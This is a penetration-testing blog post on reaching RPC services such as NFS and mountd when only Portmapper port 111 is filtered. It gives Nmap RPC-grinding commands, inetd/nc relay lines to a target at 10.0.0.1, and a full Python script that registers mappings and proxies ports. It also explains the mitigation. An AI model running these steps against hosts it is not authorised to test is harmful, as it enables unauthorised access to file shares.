
Heya - HollyGraceful here. I make all of this content in my spare time; like it? Please support me :)
You can donate via Bitcoin or Patreon!

Bypass RPC Portmapper Filtering

Portmapper (rpcbind on current systems) is the registry of ONC Remote Procedure Call services on a host. For each registered service it records the RPC program number, the version number, the transport protocol (TCP or UDP) and the port the service is listening on. It listens on port 111, both TCP and UDP.

A client that wants to talk to an RPC service first asks the Portmapper which port that service is listening on. An administrator may filter port 111 believing that this stops attackers reaching the services it advertises; it does not, because the services still listen on their own ports. An attacker who finds those ports by scanning can run a Portmapper locally, load it with the target's mappings and proxy each service port to the target, so that standard client tools work exactly as if they were talking to an unfiltered host.

Impact: An attacker can reach vulnerable RPC services on a host whose Portmapper port is filtered but whose service ports are not. Filtering 111 on its own is not a control; the service ports themselves must be filtered (or the services bound to fixed ports that are), and the services hardened.

Affected: Unix and Linux servers offering RPC services (NFS, mountd and the other rpc.* daemons) behind a filter on port 111 alone.

Exploitation:

First determine which RPC services the target offers. Nmap's RPC grinding identifies the program number and version behind an open port without asking the Portmapper, which is exactly what is needed here. Join the port ranges with a comma; with a space, Nmap would treat 20000-50000 as a second target:

nmap -sR -p 111-5000,20000-50000 10.0.0.1
nmap -sU -sR -p 111-5000,20000-50000 10.0.0.1

On current Nmap releases -sR is an alias for -sV, whose version detection includes the RPC grinder; the rpc-grind NSE script does the same against chosen ports.

Create a file describing what Nmap found, in the format that pmap_dump and rpcinfo -p print: program number, version, protocol, port and (optionally) the service name. Program numbers are six digits: 100000 is the Portmapper itself and 100003 is NFS. Include every service you found; showmount, for instance, talks to mountd (program 100005) rather than to NFS, so its port must be listed as well. For example:

100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs

Start a local Portmapper and load the file into it:

# portmap
# pmap_set < rpc_file_data

pmap_set and pmap_dump ship with the classic portmap package. Distributions that have replaced it with rpcbind do not provide them; there the mappings have to be registered by sending PMAPPROC_SET calls to 127.0.0.1:111, which rpcbind accepts from loopback (and only from loopback unless it was started with -i).

Test the setup by running rpcinfo against your own machine; it should print the same table as the file:

# rpcinfo -p 127.0.0.1

Now set up the attacking machine to relay each service port to the target.

Store the mappings in a tab-separated inetd configuration file, inetd.conf, one line per protocol and port. This example relays NFS on 2049; relay the mountd port the same way, or showmount will have nothing to talk to. inetd looks the first field up in /etc/services, so if yours rejects a bare port number use the service name instead (2049 is nfs):

2049 stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 2049
2049 dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 2049

Stop any running inetd and start one on that file:

# killall inetd
# inetd ./inetd.conf

Services requested on the local machine now resolve through the local Portmapper, and inetd relays the connection to the target, so ordinary client software works unchanged. For example:

# showmount -e 127.0.0.1

example output:

Export list for 127.0.0.1:
 / (everyone)

The export list belongs to the target, not to 127.0.0.1: showmount asked the local Portmapper for mountd's port and inetd relayed the MOUNT request to 10.0.0.1.
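The whole procedure above, from the mapping file through registration to the relays, in one script. This is an added example, not the post's own tooling: it replaces pmap_set (useful where only rpcbind is installed) and the inetd/nc lines by sending PMAPPROC_SET calls (RFC 1833) to the local Portmapper on 127.0.0.1:111 and then listening on each mapped port and relaying it to the target. The map text, the mountd port 20048 in it and the target address 10.0.0.1 are constructed for illustration and must be replaced with what Nmap reported; a Portmapper (portmap or rpcbind) must already be listening locally, and the script needs root if any mapped port is below 1024.

```python
"""Register a target's RPC services with the LOCAL portmapper and relay each mapped
port to the target. Added example (not the post's tooling) replacing pmap_set and
the inetd/nc lines; assumes portmap or rpcbind already listens on 127.0.0.1:111."""
import socket
import struct
import threading

PMAP_PROG, PMAP_VERS, PMAPPROC_SET = 100000, 2, 1   # portmapper v2 (RFC 1833)
IPPROTO = {"tcp": 6, "udp": 17}                     # protocol numbers used in mappings
TARGET = "10.0.0.1"                                 # assumed target from the post

# Constructed sample in pmap_dump / rpcinfo -p format (prog vers proto port [name]);
# the ports, the mountd one especially, are illustrative: use what Nmap reported.
MAP_TEXT = """
100003 3 tcp 2049 nfs
100003 3 udp 2049 nfs
100005 3 tcp 20048 mountd
100005 3 udp 20048 mountd
"""

def parse_map(text):
    """Return (prog, vers, proto, port) tuples; blank/# lines and the name column are ignored."""
    entries = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        prog, vers, proto, port = int(fields[0]), int(fields[1]), fields[2].lower(), int(fields[3])
        if proto not in IPPROTO or not 0 < port < 65536:
            raise ValueError("bad map line: %r" % line)
        entries.append((prog, vers, proto, port))
    return entries

def rpc_call(xid, prog, vers, proc, args):
    """Encode an ONC RPC v2 CALL (RFC 5531) with AUTH_NONE credentials and verifier."""
    header = struct.pack(">6I", xid, 0, 2, prog, vers, proc)   # msg_type 0 = CALL, rpcvers 2
    auth = struct.pack(">4I", 0, 0, 0, 0)                      # cred + verf: flavor 0, length 0
    return header + auth + args

def pmap_set_call(xid, prog, vers, proto, port):
    """PMAPPROC_SET with a mapping {prog, vers, prot, port} as its argument."""
    mapping = struct.pack(">4I", prog, vers, IPPROTO[proto], port)
    return rpc_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_SET, mapping)

def rpc_result(reply, xid):
    """Return the 32-bit result of an accepted, successful REPLY to xid, else None."""
    rxid, msg_type, reply_stat, _flavor, verf_len = struct.unpack(">5I", reply[:20])
    if rxid != xid or msg_type != 1 or reply_stat != 0:        # 1 = REPLY, 0 = MSG_ACCEPTED
        return None
    offset = 20 + (verf_len + 3) // 4 * 4                      # skip the XDR-padded verifier body
    accept_stat, result = struct.unpack(">2I", reply[offset:offset + 8])
    return result if accept_stat == 0 else None                # 0 = SUCCESS

def register_locally(entries, pmap_host="127.0.0.1"):
    """One PMAPPROC_SET per entry over UDP to the local portmapper; returns a bool per entry."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)
    results = []
    for xid, (prog, vers, proto, port) in enumerate(entries, start=1):
        sock.sendto(pmap_set_call(xid, prog, vers, proto, port), (pmap_host, 111))
        results.append(rpc_result(sock.recv(4096), xid) == 1)   # XDR bool TRUE = 1
    return results

def pump(src, dst):
    """Copy bytes from src to dst until EOF, then close dst (one direction of a TCP relay)."""
    while chunk := src.recv(65536):
        dst.sendall(chunk)
    dst.close()

def tcp_relay(port, target):
    """Accept on the mapped TCP port and relay each connection to target:port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", port))
    listener.listen(5)
    while True:
        client, _ = listener.accept()
        upstream = socket.create_connection((target, port))
        threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pump, args=(upstream, client), daemon=True).start()

def udp_relay(port, target):
    """Forward each datagram to target:port and the first reply back (one at a time, like inetd 'wait')."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("127.0.0.1", port))
    upstream = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    upstream.settimeout(5)
    while True:
        data, client = listener.recvfrom(65536)
        upstream.sendto(data, (target, port))
        try:
            listener.sendto(upstream.recv(65536), client)
        except socket.timeout:
            pass                                               # lost reply: do not wedge the relay

if __name__ == "__main__":
    entries = parse_map(MAP_TEXT)
    print("registered:", register_locally(entries))
    for proto, port in sorted({(e[2], e[3]) for e in entries}):   # one relay per proto/port
        threading.Thread(target=tcp_relay if proto == "tcp" else udp_relay,
                         args=(port, TARGET), daemon=True).start()
    threading.Event().wait()                                   # keep relaying; now run showmount -e 127.0.0.1
```

Run it, then rpcinfo -p 127.0.0.1 should list the target's programs and showmount -e 127.0.0.1 should return the target's exports. The UDP relay deliberately handles one request at a time, which is all rpcinfo- and showmount-style request/reply traffic needs; registration is done over UDP because rpcbind checks that SET requests originate from loopback, so nothing here has to be reachable from outside the attacking machine.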